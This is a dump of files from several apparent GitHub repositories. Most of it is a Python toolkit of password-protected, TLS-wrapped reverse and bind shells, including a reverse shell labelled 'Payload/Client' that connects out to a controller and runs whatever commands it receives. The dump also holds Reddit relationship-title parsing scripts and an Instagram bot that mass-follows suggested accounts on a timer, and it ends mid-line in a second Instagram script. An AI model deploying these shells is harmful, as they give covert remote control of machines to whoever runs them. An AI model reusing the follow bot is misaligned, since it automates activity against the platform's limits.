"text": "#!/usr/bin/env python3\n\"\"\"\nPySslShells - Reverse Shell Server\nAuthor: Darkerego <[email protected]>\n\"\"\"\nimport ssl\nimport socket\nfrom sys import exit\nfrom time import sleep\n\n# ip address of server, can use own computer's private IP if doing on local\n\nhost = '127.0.0.1'\nport = int(9999)\npw = 'lol'\ndebug = True\n\n\ndef create_socket():\n try:\n global host\n global port\n global s\n host = ''\n port = 9999\n # don't use common ports like 80, 3389\n\n s = socket.socket() # actual conversation between server and client\n s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) # Set is so that when we cancel out we can reuse port.\n except socket.error as msg:\n print(\"Error creating socket: \" + str(msg))\n else:\n s = ssl.wrap_socket(s, certfile='../ssl/server.crt', keyfile='../ssl/server.key',\n ssl_version=ssl.PROTOCOL_TLSv1)\n\n\n# binds socket to port and wait for connection from client/target\ndef socket_bind():\n try:\n global host\n global port\n global s\n print(\"Binding socket to port: \" + str(port))\n try:\n s.bind((host, port))\n except OSError:\n print('Address already in use. Quitting.')\n exit(1)\n s.listen(5)\n except socket.error as msg:\n print(\"Error binding socket to port: \" + str(msg) + \"\\n\" + \"Retrying in ten seconds...\")\n sleep(10)\n socket_bind()\n\n\n# establish connection with client (socket must be listening for connections)\ndef socket_accept():\n conn, address = s.accept()\n print(\"Connection has been established | \" + \"IP \" + address[0] + \" | Port \" + str(address[1]))\n send_commands(conn)\n conn.close()\n\n\n# sends commands to target/client computer to remote-control it\ndef send_commands(conn):\n authenticated = False\n if not authenticated:\n pw = input('Password: ')\n conn.send(str.encode(pw))\n response = str(conn.recv(1024), \"utf-8\")\n if response != 'Invalid password\\n':\n print(response, end='')\n else:\n print('ERROR authenticating: %s ' % response)\n conn.close()\n exit(1)\n while True: # infinite loop for connection to stay constant\n try:\n cmd = input() # cmd = command we type into terminal to send to client\n except KeyboardInterrupt:\n print('\\nCaught Signal, exiting ...\\n')\n conn.close()\n exit(1)\n else:\n if cmd == '__quit__':\n conn.send(str.encode(cmd))\n conn.close()\n exit()\n if len(str.encode(cmd)) > 0:\n conn.send(str.encode(cmd))\n client_response = str(conn.recv(4096), \"utf-8\")\n print(client_response, end=\"\") #\n\n\ndef main():\n\n create_socket()\n socket_bind()\n socket_accept()\n\n\nmain()\n"
},
{
"alpha_fraction": 0.4749022126197815,
"alphanum_fraction": 0.5032594799995422,
"avg_line_length": 29.989898681640625,
"blob_id": "5f958d7e76f61b9cdf8a73b912523fc5d4703dda",
"content_id": "e6d87aa3eb54f8f1b977c3d5084d69ec3de05647",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3068,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 99,
"path": "/bind/bind_shell.py",
"repo_name": "darkerego/py_password_ssl_shells",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n\nimport socket\nimport os\nimport subprocess\nimport sys\nimport ssl\nfrom sys import exit\nimport hashlib\nimport hmac\n\n\ndef is_correct_password(salt: bytes, pw_hash: bytes, password: str) -> bool:\n \"\"\"\n Given a previously-stored salt and hash, and a password provided by a user\n trying to log in, check whether the password is correct.\n \"\"\"\n return hmac.compare_digest(\n pw_hash,\n hashlib.pbkdf2_hmac('sha256', password.encode(), salt, 100000)\n )\n\n\n# Run gen_shell_pw.py to generate your hash and salt\npw_hash = '9ee966f577b758ba49181c6ca88d38476958010ee0153116c6471de148ac8b76'\nsalt = '4c78ba4182b1ee8d175ca60321c7122e'\ndebug = True\n\n\ndef main():\n global client\n # global sock\n try:\n try:\n port = int(sys.argv[2])\n except:\n port = 9999\n try:\n ip = sys.argv[1]\n except:\n ip = \"127.0.0.1\"\n\n host = (ip, port)\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n sock = ssl.wrap_socket(s, certfile='../ssl/server.crt', keyfile='../ssl/server.key',\n ssl_version=ssl.PROTOCOL_TLSv1)\n\n try:\n sock.bind(host)\n except OSError:\n print('Address in use!')\n return False\n else:\n sock.listen(1)\n\n while True:\n client, address = sock.accept()\n if debug:\n print(f'Accepted connected from {address[0]}:{address[1]}')\n while True:\n client.send(str.encode('Password: '))\n pw = client.recv(1024)[:].decode('utf-8').rstrip('\\n')\n if is_correct_password(bytes.fromhex(salt), bytes.fromhex(pw_hash), pw):\n authenticated = True\n break\n else:\n client.send(str.encode('Incorrect Password!\\n'))\n if authenticated:\n prompt = os.getcwd() + \"> \"\n client.send(prompt.encode())\n while True:\n cmd = client.recv(1024)\n if debug:\n print(cmd.decode('utf-8'))\n if cmd.decode('utf-8').rstrip('\\n') == '__quit__':\n client.close()\n exit(1)\n\n ter = subprocess.Popen(cmd.decode(\"utf-8\"), shell=True, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE, stdin=subprocess.PIPE)\n res = \"\"\n output_bytes = ter.stdout.read() + ter.stderr.read()\n output_str = output_bytes.decode('utf-8')\n for line in output_str:\n res += line\n ret = res + os.getcwd() + \"> \"\n client.send(ret.encode())\n\n except KeyboardInterrupt:\n try:\n client.send(b\"\\n\\nConnection closed... Goodbye...\\n\")\n except Exception:\n client.close()\n except socket.error:\n client.close()\n\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.46158039569854736,
"alphanum_fraction": 0.47465941309928894,
"avg_line_length": 27.671875,
"blob_id": "dcc71efa8dd39f9a10fef87f24d66af7ed0d7f98",
"content_id": "f33bfd85acc4ebede64a0323e07317f1b13b571d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1835,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 64,
"path": "/bind/connect.py",
"repo_name": "darkerego/py_password_ssl_shells",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\nimport socket\nimport ssl\nimport sys\nfrom sys import exit\nhost = '0.0.0.0'\nport = 9999\n\n\ndef socket_create():\n try:\n\n global ssls\n s = socket.socket()\n ssls = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)\n except socket.error as msg:\n print(\"Socket creation error: \" + str(msg))\n\n\n# Connect to a remote socket\ndef socket_connect():\n try:\n global host\n global port\n ssls.connect((host, port))\n except socket.error as msg:\n print(\"Socket connection error: \" + str(msg))\n else:\n login_prompt = str(ssls.recv(1024).decode())\n # print(client_response)\n if login_prompt == 'Password: ':\n pw = input('Password: ')\n ssls.send(str.encode(pw))\n client_response = ssls.recv(1024).decode()\n if client_response == 'Incorrect Password!\\n':\n print('Invalid password!')\n ssls.close()\n exit(1)\n print('Authenticated!')\n print(client_response, end='')\n\n while True:\n try:\n cmd = input()\n if len(str.encode(cmd)) > 0:\n if cmd == '__quit__':\n ssls.send(str.encode('quit'))\n ssls.close()\n sys.exit()\n else:\n ssls.send(str.encode(cmd))\n client_response = str(ssls.recv(4096).decode())\n print(client_response, end=\"\")\n except KeyboardInterrupt:\n print('Exiting shell...')\n ssls.send(str.encode('__quit__'))\n ssls.close()\n\ndef main():\n socket_create()\n socket_connect()\n\n\nmain()\n"
},
{
"alpha_fraction": 0.586355447769165,
"alphanum_fraction": 0.6025134921073914,
"avg_line_length": 29.282608032226562,
"blob_id": "12e43159bc88f860a03df31e8ce4862f7935234b",
"content_id": "e97ec9618c28cef66f4ae1193bd9f848a809ac2d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2785,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 92,
"path": "/reverse/reverse_shell.py",
"repo_name": "darkerego/py_password_ssl_shells",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n\"\"\"\nPySslShells - Reverse Shell Payload/Client\nAuthor: Darkerego <[email protected]>\n\"\"\"\nimport socket\nfrom os import getcwd, chdir\nfrom sys import exit\nimport subprocess\nimport ssl\nimport hashlib\nimport hmac\n\n\ndef is_correct_password(salt: bytes, pw_hash: bytes, password: str) -> bool:\n \"\"\"\n Given a previously-stored salt and hash, and a password provided by a user\n trying to log in, check whether the password is correct.\n \"\"\"\n return hmac.compare_digest(\n pw_hash,\n hashlib.pbkdf2_hmac('sha256', password.encode(), salt, 100000)\n )\n\n\ns = socket.socket() # client computer can connect to others\ns = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_TLSv1)\ndebug = True\n# ip address of server, can use own computer's private IP if doing on local\nhost = '127.0.0.1'\nport = 9999\nconnected = False\npw_hash = '9ee966f577b758ba49181c6ca88d38476958010ee0153116c6471de148ac8b76'\nsalt = '4c78ba4182b1ee8d175ca60321c7122e'\n\n# infinite loop for continuous listening for server's commands\n\n\ndef shell():\n while True:\n data = s.recv(4096)\n if data[:2].decode(\"utf-8\") == 'cd':\n chdir(data[3:].decode(\"utf-8\"))\n if data[:2].decode(\"utf-8\") == '__quit__':\n if debug:\n print(data[:2].decode(\"utf-8\"))\n s.close()\n exit(0)\n\n if len(data) > 0: # check if there are actually data/commands received (that is not cd)\n cmd = subprocess.Popen(data[:].decode(\"utf-8\"), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE,\n stdin=subprocess.PIPE)\n\n # bytes and string versions of results\n output_bytes = cmd.stdout.read() + cmd.stderr.read() # bytes version of streamed output\n output_str = str(output_bytes, \"utf-8\") # plain old basic string\n\n # getcwd allows the server side to see where the current working directory is on the client\n s.send(str.encode(output_str + str(getcwd()) + '> '))\n # print(output_str) # client can see what server side is doing\n\n\ndef main():\n # Perform server authentication\n authenticated = False\n s.connect((host, port)) # binds client computer to server computer\n auth = s.recv(1024)\n pw = auth[:].decode()\n if is_correct_password(bytes.fromhex(salt), bytes.fromhex(pw_hash), pw):\n authenticated = True\n\n if authenticated:\n prompt = getcwd() + '> '\n s.send(str.encode(prompt))\n\n else:\n s.send(str.encode('Invalid password\\n'))\n exit(1)\n\n# close connection\n if authenticated:\n try:\n shell()\n except KeyboardInterrupt:\n s.close()\n exit(0)\n except Exception as err:\n if debug:\n print('Error:' + str(err))\n s.close()\n exit(0)\nmain()"
},
{
"alpha_fraction": 0.640373170375824,
"alphanum_fraction": 0.6624257564544678,
"avg_line_length": 27.071428298950195,
"blob_id": "ea4827afac626f57996695f8010e461113632684",
"content_id": "46757293d55879504a26fd69c09c505428469b97",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1179,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 42,
"path": "/gen_shell_pw.py",
"repo_name": "darkerego/py_password_ssl_shells",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\nfrom typing import Tuple\nimport os\nimport hashlib\nimport hmac\n\n\ndef hash_new_password(password: str) -> Tuple[bytes, bytes]:\n \"\"\"\n Hash the provided password with a randomly-generated salt and return the\n salt and hash to store in the database.\n \"\"\"\n salt = os.urandom(16)\n pw_hash = hashlib.pbkdf2_hmac('sha256', password.encode(), salt, 100000)\n return salt, pw_hash\n\n\ndef is_correct_password(salt: bytes, pw_hash: bytes, password: str) -> bool:\n \"\"\"\n Given a previously-stored salt and hash, and a password provided by a user\n trying to log in, check whether the password is correct.\n \"\"\"\n return hmac.compare_digest(\n pw_hash,\n hashlib.pbkdf2_hmac('sha256', password.encode(), salt, 100000)\n )\n\n# hash a password\npw = input('Enter a password: ')\npw2 = input('Confirm Password: ')\nif pw != pw2:\n print('Passwords do not match!. Quitting.')\n exit(1)\n\nsalt, pw_hash = hash_new_password(pw)\nsalt = salt.hex()\npw_hash = pw_hash.hex()\n\nif is_correct_password(bytes.fromhex(salt), bytes.fromhex(pw_hash), pw):\n print('Test Succeeded!')\n print(\"Salt: %s\" % salt)\n print(\"Hash: %s\" % pw_hash)\n"
}
] | 5 |
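Both shells above authenticate against a hex-encoded salt and a PBKDF2-SHA256 hash produced by gen_shell_pw.py. The scheme in isolation, using only the stdlib calls the repo itself uses — the password value below is a placeholder, not the repo's:

import os, hashlib, hmac

password = 'example'  # placeholder password for illustration
salt = os.urandom(16)
pw_hash = hashlib.pbkdf2_hmac('sha256', password.encode(), salt, 100000)

# verification: re-derive the hash from the attempt and compare in constant time
attempt = 'example'
ok = hmac.compare_digest(
    pw_hash,
    hashlib.pbkdf2_hmac('sha256', attempt.encode(), salt, 100000))
print(ok)  # True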
peterdolan/relationships_data_extraction | https://github.com/peterdolan/relationships_data_extraction | 8bf44fc0aff4b0b483f8f8dfe71b4d58f593a20e | 95062cb16e00e24a30b1b352cd23cf1dc8a06372 | 3711991c11e476bb6e10e330faa0e72544b95636 | refs/heads/master | 2021-05-01T03:26:45.732611 | 2018-03-26T00:58:30 | 2018-03-26T00:58:30 | 121,192,438 | 1 | 0 | null | 2018-02-12T02:53:52 | 2018-03-26T00:19:00 | 2018-03-26T00:46:50 | Python |
[
{
"alpha_fraction": 0.800000011920929,
"alphanum_fraction": 0.800000011920929,
"avg_line_length": 19,
"blob_id": "355c287cb8716f2a10f68fdaf97cedec81aa66c8",
"content_id": "2a465c1d2033339a169ad1c18eb2ccff18545db2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 40,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 2,
"path": "/README.md",
"repo_name": "peterdolan/relationships_data_extraction",
"src_encoding": "UTF-8",
"text": "# relationships_data_extraction\nideas!:\n"
},
{
"alpha_fraction": 0.4955555498600006,
"alphanum_fraction": 0.5122222304344177,
"avg_line_length": 30.034482955932617,
"blob_id": "5902439273ebd6417a52bcb71f258846f003b46f",
"content_id": "b3fc4aef9434473b0f4f2d2f27b3ddb4091f96a2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 900,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 29,
"path": "/archive/change_csv.py",
"repo_name": "peterdolan/relationships_data_extraction",
"src_encoding": "UTF-8",
"text": "import csv\n\nwith open('titles_data.csv', 'rb') as csvfile:\n with open('test_set.py', 'w') as test:\n test.write(\"test_set = [\")\n test_set = []\n reader = csv.reader(csvfile)\n for row in reader:\n new_obj = {}\n poster = {}\n counterpart = {}\n new_obj[\"title\"] = row[0].strip()\n i = 0\n if len(row[1]) > 3:\n new_obj[\"title\"] += row[1]\n i +=1\n if len(row[2]) > 3:\n new_obj[\"title\"] += row[2]\n i +=1\n poster[\"age\"] = row[1 + i].strip()\n poster[\"gender\"] = row[2 + i].strip().upper()\n counterpart[\"age\"] = row[3 + i].strip()\n counterpart[\"gender\"] = row[4 + i].strip().upper()\n counterpart[\"relationship\"] = row[5 + i].strip().lower()\n new_obj[\"poster\"] = poster\n new_obj[\"counterpart\"] = counterpart\n test_set.append(new_obj)\n test.write(str(new_obj).strip() + ',\\n')\n test.write(\"]\")\n"
},
{
"alpha_fraction": 0.5347937941551208,
"alphanum_fraction": 0.5347937941551208,
"avg_line_length": 11.721311569213867,
"blob_id": "af7b43046e54534e83d5277dc927305294765389",
"content_id": "820c73dce7a691f51743c38543940bdd34e5148b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 778,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 61,
"path": "/hardcoded_relationship_descriptor_words.py",
"repo_name": "peterdolan/relationships_data_extraction",
"src_encoding": "UTF-8",
"text": "self_words = [\n \"me\",\n \"i\",\n \"i've\",\n \"i'm\"\n]\n\nmale_relation_words = [\n \"father\",\n \"dad\",\n \"son\",\n \"brother\",\n \"grandfather\",\n \"grandson\",\n \"father-in-law\",\n \"uncle\",\n \"husband\",\n \"boyfriend\",\n \"bf\",\n \"guy\",\n \"brother-in-law\",\n \"nephew\",\n \"ex-bf\",\n \"ex-boyfriend\",\n]\n\nfemale_relation_words = [\n \"mother\",\n \"mom\",\n \"mum\",\n \"daughter\",\n \"sister\",\n \"grandmother\",\n \"wife\",\n \"granddaughter\",\n \"aunt\",\n \"niece\",\n \"sister-in-law\",\n \"mother-in-law\",\n \"girlfriend\",\n \"gf\",\n \"girl\",\n \"ex-gf\",\n \"ex-girlfriend\",\n]\n\nrelation_words = [\n \"parent\",\n \"children\",\n \"grandparent\",\n \"grandchild\",\n \"so\",\n \"friend\",\n \"roommate\",\n \"crush\",\n \"partner\",\n \"fiance\",\n \"fiancé\",\n \"fiancée\",\n \"cousin\",\n] + male_relation_words + female_relation_words\n"
},
{
"alpha_fraction": 0.6476190686225891,
"alphanum_fraction": 0.6613756418228149,
"avg_line_length": 29.483871459960938,
"blob_id": "8df0114a506cf02c15beef58d275494f24512ac2",
"content_id": "2daa8af650aed743d657ba001e50e47af6f65cf5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 945,
"license_type": "no_license",
"max_line_length": 107,
"num_lines": 31,
"path": "/data_analysis_functions.py",
"repo_name": "peterdolan/relationships_data_extraction",
"src_encoding": "UTF-8",
"text": "import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndata = pd.read_csv(filepath_or_buffer=\"/Users/peterdolan/Engineering/reddit/small_relationship_data.csv\")\n\ndef get_distribution():\n plt.figure()\n data[\"post_gen\"].hist(bins = 100, range=[0,100]).plot()\n plt.savefig(\"temp.png\")\n\ndef get_gender_stats():\n#print (data.groupby([\"post_gen\"]).agg(['mean', 'count']))\n print (\"greater than 1: \")\n#print(data.loc[(data[\"score\"] > 1)].groupby([\"post_gen\"]).agg([\"mean\", \"count\"]))\n print(data.loc[(data[\"score\"] > 1) & (data[\"score\"] < 100)].groupby([\"post_gen\"]).agg([\"mean\", \"count\"]))\n\ndef get_relationship_distribution():\n print (data[\"relationship\"].value_counts())\n\ndef get_correlation():\n corr = data[\"post_gen\"].corr(data[\"score\"])\n print ('hi')\n print (corr)\n\ndef get_word_breakdown():\n \n s_corr = data[\"title\"].str.get_dummies(sep=' ').corrwith(data.score/data.score.max())\n print (s_corr)\n\nget_distribution()\n"
},
{
"alpha_fraction": 0.6316176652908325,
"alphanum_fraction": 0.6406862735748291,
"avg_line_length": 38.61165237426758,
"blob_id": "94ef4ba91896f8d304cd7e230d12731d861bff85",
"content_id": "b317e89f0c2b024ad0423e1b0778cc525426ab8c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4080,
"license_type": "no_license",
"max_line_length": 265,
"num_lines": 103,
"path": "/title_extraction.py",
"repo_name": "peterdolan/relationships_data_extraction",
"src_encoding": "UTF-8",
"text": "# Potential improvements: stack rank relationships, take best one found (gf over so for example)\n# spell check/simplifier (huband -> husband for example, daughter's -> daughter)\n# delete \"mid\" from within captured parens\n# compound words get dashed. \"sister in law\" -> \"sister-in-law\"\n\nimport re\nfrom test_set import test_set\nfrom training_set import training_set\nfrom relationship_words import self_words, relation_words, male_relation_words, female_relation_words\n\ndef get_diff(correct, generated):\n if (correct[\"poster\"] == generated[\"poster\"] \n and correct[\"counterpart\"] == generated[\"counterpart\"]):\n return 1\n else:\n print (\"--------------------\")\n print (correct[\"title\"])\n if (correct[\"poster\"][\"gender\"] != generated[\"poster\"][\"gender\"]):\n print (\"Poster gender mismatch. \" + correct[\"poster\"][\"gender\"] + \"|\" + generated[\"poster\"][\"gender\"])\n if (correct[\"poster\"][\"age\"] != generated[\"poster\"][\"age\"]):\n print (\"Poster age mismatch. \" + correct[\"poster\"][\"age\"] + \"|\" + generated[\"poster\"][\"age\"])\n if (correct[\"counterpart\"][\"gender\"] != generated[\"counterpart\"][\"gender\"]):\n print (\"Counterpart gender mismatch. \" + correct[\"counterpart\"][\"gender\"] + \"|\" + generated[\"counterpart\"][\"gender\"])\n if (correct[\"counterpart\"][\"age\"] != generated[\"counterpart\"][\"age\"]):\n print (\"Counterpart age mismatch. \" + correct[\"counterpart\"][\"age\"] + \"|\" + generated[\"counterpart\"][\"age\"])\n if (correct[\"counterpart\"][\"relationship\"] != generated[\"counterpart\"][\"relationship\"]):\n print (\"Counterpart relationship mismatch. \" + correct[\"counterpart\"][\"relationship\"] + \"|\" + generated[\"counterpart\"][\"relationship\"])\n return 0\n\ndef create_poster_object(data):\n poster = {\"age\":\"\", \"gender\":\"\"}\n\n age = re.findall(r'\\d+', data[1])\n if (age and len(age) > 0):\n poster[\"age\"] = age[0]\n\n gender = re.findall('M|F', data[1].upper())\n if (gender):\n poster[\"gender\"] = gender[0]\n\n return poster\n\ndef create_counterpart_object(person, title):\n counterpart = {\"age\":\"\", \"gender\":\"\", \"relationship\":\"\"}\n if (person[0].lower() in relation_words):\n counterpart[\"relationship\"] = person[0].lower()\n\n age = re.findall(r'\\d+', person[1])\n if (age and len(age) > 0):\n counterpart[\"age\"] = age[0]\n\n gender = re.findall('M|F', person[1].upper())\n if (gender):\n counterpart[\"gender\"] = gender[0]\n\n if not counterpart[\"relationship\"]:\n for word in title.split(\" \"):\n if word in relation_words:\n counterpart[\"relationship\"] = word\n break\n\n if counterpart[\"relationship\"] in female_relation_words:\n counterpart[\"gender\"] = \"F\"\n if counterpart[\"relationship\"] in male_relation_words:\n counterpart[\"gender\"] = \"M\"\n\n return counterpart \n\ndef extract_relations(people, title):\n if (people[0][0].lower() in relation_words or people[1][0].lower() in self_words):\n poster = create_poster_object(people[1])\n counterpart = create_counterpart_object(people[0], title)\n else:\n poster = create_poster_object(people[0])\n counterpart = create_counterpart_object(people[1], title)\n \n return {\"poster\": poster, \"counterpart\": counterpart}\n \ndef extract(title):\n people = re.findall(\"(\\w+)\\s?(\\[|\\()(.*?)(\\]|\\))\", title)\n if (len(people) == 2):\n for counter, match in enumerate(people):\n people[counter] = match[0:4:2]\n relationships = extract_relations(people, title)\n relationships[\"title\"] = title\n return 
relationships\n return \"\"\n\n\ndef extract_list(list):\n total = 0\n total_correct = 0\n for tagged_obj in list:\n relationships = extract(tagged_obj[\"title\"])\n if (relationships != \"\"):\n total += 1\n total_correct += get_diff(tagged_obj, relationships)\n\n print (str(total_correct) + \" out of a possible \" + str(total))\n\n#single = [{\"title\":\"I [18 M] have been dating my gf [18 F] for a month, and I want to build our personal relationship more, rather than our physical relationship\", \"poster\":{\"age\":\"18\", \"gender\":\"M\"}, \"counterpart\":{\"age\":\"18\", \"gender\":\"F\", \"relationship\":\"gf\"}}]\n \n#extract_list(test_set)\n"
},
{
"alpha_fraction": 0.5458422303199768,
"alphanum_fraction": 0.5756929516792297,
"avg_line_length": 26.58823585510254,
"blob_id": "48874b9a68d3cecbbed725b7cf72f300ef5bba2e",
"content_id": "82f15b18965eb2669aa8339360797276f56003a6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 469,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 17,
"path": "/general_reddit_data_to_relationship_only.py",
"repo_name": "peterdolan/relationships_data_extraction",
"src_encoding": "UTF-8",
"text": "import json\n\ndef json_readr(file):\n for line in open(file, mode=\"r\"):\n yield json.loads(line)\n\nf=open(\"relationships_11\", \"a+\")\ntotal = 0\n\ngenerator = json_readr('RS_2017-11')\nfor object in generator:\n if ('subreddit' in object and object['subreddit'] == 'relationships'):\n #f.write(object['subreddit'] + ' ' + object['title'] + '\\n')\n total += 1\n if (total%100 == 0):\n print (total)\n f.write(json.dumps(object))\n"
},
{
"alpha_fraction": 0.5291051268577576,
"alphanum_fraction": 0.5377932190895081,
"avg_line_length": 32.82352828979492,
"blob_id": "1b04e1379b38f2a285a9bd05c83a5625397f568a",
"content_id": "ffa42457b82c3f54cd83b246621f45731deca550",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1151,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 34,
"path": "/write_final_csv.py",
"repo_name": "peterdolan/relationships_data_extraction",
"src_encoding": "UTF-8",
"text": "import json\nfrom title_extraction import extract\n\ndef json_readr(file):\n for line in open(file, mode=\"r\"):\n yield json.loads(line)\n\nf=open(\"final_relationship_data.csv\", \"a+\")\n\ndef getRelationData():\n total = 0\n generator = json_readr('relationships')\n f.write(\"title,post_age,post_gen,count_age,count_gen,relationship,score,num_comments\")\n for object in generator:\n relationships = extract(object[\"title\"])\n print (relationships)\n if (total < 100000):\n total += 1\n if (relationships != \"\"):\n f.write(\n relationships[\"title\"].replace(\",\", \"\") + \",\" +\n relationships[\"poster\"][\"age\"] + \",\" +\n relationships[\"poster\"][\"gender\"] + \",\" +\n relationships[\"counterpart\"][\"age\"] + \",\" +\n relationships[\"counterpart\"][\"gender\"] + \",\" +\n relationships[\"counterpart\"][\"relationship\"] + \",\" +\n str(object[\"score\"]) + \",\" +\n str(object[\"num_comments\"]) + \"\\n\")\n else:\n break\n#total += 1\n#f.write(object[\"title\"].encode('utf-8') + '\\n')\n\ngetRelationData()\n\n"
}
] | 7 |
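title_extraction.py above pivots on a single regex: it finds each word followed by a bracketed or parenthesised age/gender token, and match[0:4:2] keeps just the word and the token's contents from each 4-tuple. A quick sketch of that step on an invented post title (not one from the dataset):

import re

title = 'My gf [22F] and I (23 M) disagree'  # hypothetical example title
people = re.findall(r'(\w+)\s?(\[|\()(.*?)(\]|\))', title)
people = [m[0:4:2] for m in people]  # keep (word, bracket contents)
print(people)  # [('gf', '22F'), ('I', '23 M')]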
hatrick36/Web-scraping-Web-automation | https://github.com/hatrick36/Web-scraping-Web-automation | af16d33d575efe7bdfdbe45643219455f3c2aef8 | 3265f4f3043ec331a44ea4ba9f3e1fc9ee1fe09b | 2a3c5cd772ea37d35e1aeba288a8e198960cc927 | refs/heads/master | 2023-02-20T11:07:06.019536 | 2021-01-16T02:03:03 | 2021-01-16T02:03:03 | 308,450,868 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6161583662033081,
"alphanum_fraction": 0.6219987273216248,
"avg_line_length": 40.09333419799805,
"blob_id": "4d0ba44faac1739d1f5a729301f12086324c1d8f",
"content_id": "a2ff032e6f6836b1f6066c564f572df6fa5e1c5c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3082,
"license_type": "no_license",
"max_line_length": 132,
"num_lines": 75,
"path": "/Social_media_automation/Insta_follow.py",
"repo_name": "hatrick36/Web-scraping-Web-automation",
"src_encoding": "UTF-8",
"text": "# The following program uses selenium to navigate and interact with he instagram platform to follow profiles on the\n# the users suggested page\nfrom selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nimport os\nimport time\n\n\nclass Instabot(object):\n username = None\n \"\"\"\n initializes an instance of the Instabot class.\n \n Call the login function to authenticate a user with IG\n \n Args:\n username:str: The instagram username for the user\n password:str: The instagram password for the user\n \n Attributes:\n driver.Selenium.webdriver.Chrome: The chromedriver that is used to automate browser activity\n \"\"\"\n\n def __init__(self, username, password):\n self.username = username\n self.password = password\n self.driver = webdriver.Chrome('chromedriver80.exe')\n self.base_url = 'https://www.instagram.com'\n self.login()\n\n def login(self):\n # calls chromedriver defined in __init__ navigate to the base url with the formatted text\n self.driver.get('{}/accounts/login/'.format(self.base_url))\n # utilizes webDriverWait to allow chromedriver to load page then clicks and enters credentials via 'send_keys'\n username_element = WebDriverWait(self.driver, 10).until(EC.presence_of_element_located((By.NAME, \"username\")))\n username_element.send_keys(self.username)\n self.driver.find_element_by_name('password').send_keys(self.password)\n #sleep is thorn in to allow pages to load\n time.sleep(1)\n self.driver.find_elements_by_xpath(\"//div[contains(text(), 'Log In')]\")[0].click()\n time.sleep(3)\n def nav_page(self, page):\n # navigates to page specified with kwarg 'page' called in main\n self.driver.get('{}/{}/'.format(self.base_url, page))\n\n def follow_user(self):\n #I put a timer on this function to run for and hour\n timer = time.time()\n period = 60*60\n # finds allow 'follow buttons on the explore page and puts them in a list\n follow_button = WebDriverWait(self.driver, 10).until(\n EC.presence_of_all_elements_located((By.XPATH, \"//button[ \"\n \"contains(\"\n \"text(), \"\n \"'Follow')]\")))\n print(len(follow_button))\n print(timer)\n #the for loop iterates through the list of follow buttons clicking every 30 seconds because instagram limits follows by time\n for follow_button in follow_button:\n\n follow_button.click()\n time.sleep(30)\n if time.time() > timer + period:\n break\n\n\nif __name__ == '__main__':\n ig_bot = Instabot('USERNAME', 'PASSWORD')\n time.sleep(3)\n ig_bot.nav_page('explore/people/suggested')\n ig_bot.follow_user()\n\n print(Instabot.username)\n"
},
{
"alpha_fraction": 0.5956409573554993,
"alphanum_fraction": 0.6071121096611023,
"avg_line_length": 36.09574508666992,
"blob_id": "15afcbac7bd8c5f31b341aaa38fe081f4852804a",
"content_id": "a6310010f7a26e5fb00c72d3f4eb89ff50544175",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3487,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 94,
"path": "/Social_media_automation/Track/get_post_activity_data.py",
"repo_name": "hatrick36/Web-scraping-Web-automation",
"src_encoding": "UTF-8",
"text": "from selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nimport os\nimport pandas as pd\nimport time\nfrom selenium.common.exceptions import NoSuchElementException\n\n\n# IMPORTANT: don't try to grab multiple lists from this script just get likers and followers import any other lists\n\nclass Instabot(object):\n username = None\n \"\"\"\n initializes an instance of the Instabot class.\n \n Call the login function to authenticate a user with IG\n \n Args:\n username:str: The instagram username for the user\n password:str: The instagram password for the user\n \n Attributes:\n driver.Selenium.webdriver.Chrome: The chromedriver that is used to automate browser activity\n \"\"\"\n\n def __init__(self, username, password):\n self.username = username\n self.password = password\n self.driver = webdriver.Chrome('../chromedriver80.exe')\n self.base_url = 'https://www.instagram.com'\n self.login()\n\n def login(self):\n self.driver.get('{}/accounts/login/'.format(self.base_url))\n username_element = WebDriverWait(self.driver, 